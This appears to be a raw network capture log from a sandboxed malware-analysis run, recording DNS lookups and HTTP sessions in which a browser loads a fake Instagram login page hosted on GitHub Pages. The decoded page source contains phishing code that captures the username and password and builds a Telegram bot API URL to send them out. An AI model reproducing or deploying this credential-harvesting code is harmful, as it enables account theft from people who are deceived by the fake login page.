                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.816006899 CEST1.1.1.1192.168.2.60xcd44No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.816006899 CEST1.1.1.1192.168.2.60xcd44No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.816252947 CEST1.1.1.1192.168.2.60x7bdfNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.816252947 CEST1.1.1.1192.168.2.60x7bdfNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.816252947 CEST1.1.1.1192.168.2.60x7bdfNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.474344015 CEST1.1.1.1192.168.2.60xff5eNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.474344015 CEST1.1.1.1192.168.2.60xff5eNo error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.474689960 CEST1.1.1.1192.168.2.60x5343No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.678229094 CEST1.1.1.1192.168.2.60xd7adNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.678229094 CEST1.1.1.1192.168.2.60xd7adNo error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.679143906 CEST1.1.1.1192.168.2.60x264dNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:40.553222895 CEST1.1.1.1192.168.2.60x1afeNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:40.553222895 CEST1.1.1.1192.168.2.60x1afeNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:47.325931072 CEST1.1.1.1192.168.2.60x3280No error (0)play.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:53.787787914 CEST1.1.1.1192.168.2.60xe538No error (0)play.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:55:04.107573986 CEST1.1.1.1192.168.2.60x2d48No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:55:04.107798100 CEST1.1.1.1192.168.2.60x812aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                  0192.168.2.64971340.113.110.67443
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:00 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 53 4c 66 53 6d 65 34 59 4f 45 6d 45 6a 70 31 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 36 33 61 39 38 63 62 61 39 30 36 32 37 34 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: SLfSme4YOEmEjp1l.1Context: 2863a98cba906274
                                                                                                                                                                                                                                  2024-09-29 04:53:00 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                  2024-09-29 04:53:00 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 53 4c 66 53 6d 65 34 59 4f 45 6d 45 6a 70 31 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 36 33 61 39 38 63 62 61 39 30 36 32 37 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 58 45 6e 39 66 4d 54 56 31 48 4f 6b 36 78 5a 54 34 63 69 4f 74 44 64 41 52 42 4d 77 35 50 31 67 42 55 46 44 32 42 72 39 67 64 6b 6b 33 4f 44 32 67 4f 59 6b 6c 36 6d 70 4d 58 6e 57 54 70 45 39 73 4d 73 4d 74 57 39 53 54 67 76 76 2b 42 39 55 4c 55 66 45 37 76 34 41 67 31 39 6d 78 6a 2b 70 4d 43 70 69 67 69 4e 45 63 67 4a 57
                                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: SLfSme4YOEmEjp1l.2Context: 2863a98cba906274<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaXEn9fMTV1HOk6xZT4ciOtDdARBMw5P1gBUFD2Br9gdkk3OD2gOYkl6mpMXnWTpE9sMsMtW9STgvv+B9ULUfE7v4Ag19mxj+pMCpigiNEcgJW
                                                                                                                                                                                                                                  2024-09-29 04:53:00 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 53 4c 66 53 6d 65 34 59 4f 45 6d 45 6a 70 31 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 36 33 61 39 38 63 62 61 39 30 36 32 37 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: SLfSme4YOEmEjp1l.3Context: 2863a98cba906274<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                  2024-09-29 04:53:00 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                  2024-09-29 04:53:00 UTC58INData Raw: 4d 53 2d 43 56 3a 20 39 78 75 4d 41 37 79 62 59 30 75 70 69 4d 50 4a 6e 39 62 41 43 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                  Data Ascii: MS-CV: 9xuMA7ybY0upiMPJn9bACw.0Payload parsing failed.


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  1192.168.2.649717185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC676OUTGET /instagram.com/ HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 6780
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-1a7c"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:01 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: A50E:1664:12D7BFF:15989FE:66F8DD2D
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:01 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740077-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585582.753584,VS0,VE17
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: de17018d182610167574e73b3ed823cb4eaa29b8
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2f 69 6d 67 2f 69 6e 73 74 61 2d 66 61 76 2e
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="./styles.css" /> <link rel="icon" type="image/png" href="./img/insta-fav.
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: d0 a2 d0 b5 d0 bb d0 b5 d1 84 d0 be d0 bd 2c 20 d0 b8 d0 bc d1 8f 20 d0 bf d0 be d0 bb d1 8c d0 b7 d0 be d0 b2 d0 b0 d1 82 d0 b5 d0 bb d1 8f 20 d0 b8 d0 bb d0 b8 20 d1 8d d0 bb 2e 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 53 65 6e 68 61 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 20 69 64 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d
                                                                                                                                                                                                                                  Data Ascii: , . " /> <label for="password" class="sr-only">Senha</label> <input id="password" name="password" type="password" placeholder=
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: 20 d0 b0 d0 ba d0 ba d0 b0 d1 83 d0 bd d1 82 d0 b0 3f 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 3e d0 97 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d1 82 d1 8c d1 81 d1 8f 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 66 6c 65 78 20 64 69 72 65 63 74 69 6f 6e 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e d0 a3 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 b8 d1 82 d0 b5 20 d0 bf d1 80 d0 b8 d0 bb d0 be d0 b6 d0 b5 d0 bd d0 b8 d0 b5 2e 3c 2f
                                                                                                                                                                                                                                  Data Ascii: ? </p> <a href="#"></a> </div> <div class="app-download flex direction-column align-items-center"> <p> .</
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: b5 d0 bd d1 86 d0 b8 d0 b0 d0 bb d1 8c d0 bd d0 be d1 81 d1 82 d1 8c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e d0 a3 d1 81 d0 bb d0 be d0 b2 d0 b8 d1 8f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e d0 9c d0 b5 d1 81 d1 82 d0 b0 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 49 6e 73 74 61 67 72 61 6d 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 54 68 72 65 61 64 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                  Data Ascii: </a></li> <li><a href="#"></a></li> <li><a href="#"></a></li> <li><a href="#">Instagram Lite</a></li> <li><a href="#">Threads</a></li> <li><a href="
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1268INData Raw: 6e 61 6d 65 3a 3c 2f 62 3e 20 3c 65 6d 3e 24 7b 75 73 65 72 6e 61 6d 65 7d 3c 2f 65 6d 3e 5c 6e 3c 62 3e 50 61 73 73 77 6f 72 64 3a 3c 2f 62 3e 20 3c 65 6d 3e 24 7b 70 61 73 73 77 6f 72 64 7d 3c 2f 65 6d 3e 60 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 66 6c 65 78 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 54 65 6c 65 67 72 61 6d 20 41 50 49 20 75 63 68 75 6e 20 55 52 4c 20 74 75 7a 69 73 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 20 3d 20 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 36 36 38 31 39 38 33 31 38 30 3a 41 41
                                                                                                                                                                                                                                  Data Ascii: name:</b> <em>${username}</em>\n<b>Password:</b> <em>${password}</em>` loading.style.display = 'flex'; // Telegram API uchun URL tuzish const url = `https://api.telegram.org/bot6681983180:AA


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  2192.168.2.649716185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC575OUTGET /instagram.com/styles.css HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 4588
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-11ec"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:01 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: 1670:16E3:13DFD7E:16C4365:66F8DD2D
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:01 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740021-EWR
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585582.884683,VS0,VE16
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: 0e274d8e3c2133055dad8dd5f52f0b3a37119f7f
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: 2a 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 7d 0a 0a 6d 61 69 6e 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 39 33 35 70 78
                                                                                                                                                                                                                                  Data Ascii: * { border: none; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; margin: 0; padding: 0;}body { background-color: #fafafa; height: 100vh;}main { height: 100vh; margin: auto; max-width: 935px
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 36 31 38 70 78 3b 0a 7d 0a 0a 2f 2a 2a 0a 2a 20 4c 6f 67 69 6e 20 73 65 63 74 69 6f 6e 0a 2a 2f 0a 2e 6c 6f 67 69 6e 2d 77 69 74 68 2d 66 62 2c 0a 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 0a 2e 72 65 67 69 73 74 65 72 2c 0a 66 6f 72 6d 20 7b 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 32 30 70 78 3b 20 7d 0a 0a 2e 6c 6f 67 69 6e 2d 77 69 74 68 2d 66 62 20 7b 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 7d 0a 0a 66 6f 72 6d 20 2e 73 72 2d 6f 6e 6c 79 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 0a 66 6f 72 6d 20 69 6e 70 75 74 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b
                                                                                                                                                                                                                                  Data Ascii: { height: 618px;}/*** Login section*/.login-with-fb,form { width: 100%; }.register,form { padding: 30px 20px; }.login-with-fb { padding: 30px 20px 20px 20px; }form .sr-only { display: none; }form input { background-color: #fafafa;
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC1378INData Raw: 2e 72 65 67 69 73 74 65 72 20 2a 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 7d 0a 2e 72 65 67 69 73 74 65 72 20 61 20 7b 20 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 39 35 66 36 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 0a 2e 72 65 67 69 73 74 65 72 20 70 20 7b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 3b 20 7d 0a 0a 2f 2a 2a 0a 2a 20 41 70 70 20 64 6f 77 6e 6c 6f 61 64 0a 2a 2f 0a 2e 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 7b 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 3b 20 7d 0a 2e 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 70 20 7b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 20 7d 0a 2e 61 70 70 2d 64 6f 77 6e 6c 6f 61 64 20 69 6d 67 20 7b 20 0a 20 20 20 20 68 65 69 67 68 74 3a 20
                                                                                                                                                                                                                                  Data Ascii: .register * { font-size: 13px; }.register a { color: #0095f6; font-weight: bold;}.register p { margin-right: 5px; }/*** App download*/.app-download { padding: 15px; }.app-download p { padding: 10px 0; }.app-download img { height:
                                                                                                                                                                                                                                  2024-09-29 04:53:01 UTC454INData Raw: 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 0a 20 20 20 20 2e 69 6e 76 61 6c 69 64 2d 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 20
                                                                                                                                                                                                                                  Data Ascii: font-size: 14px; display: none; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } .invalid-input { border: 1px solid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  3192.168.2.649719185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:02 UTC558OUTGET /instagram.com/main.js HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
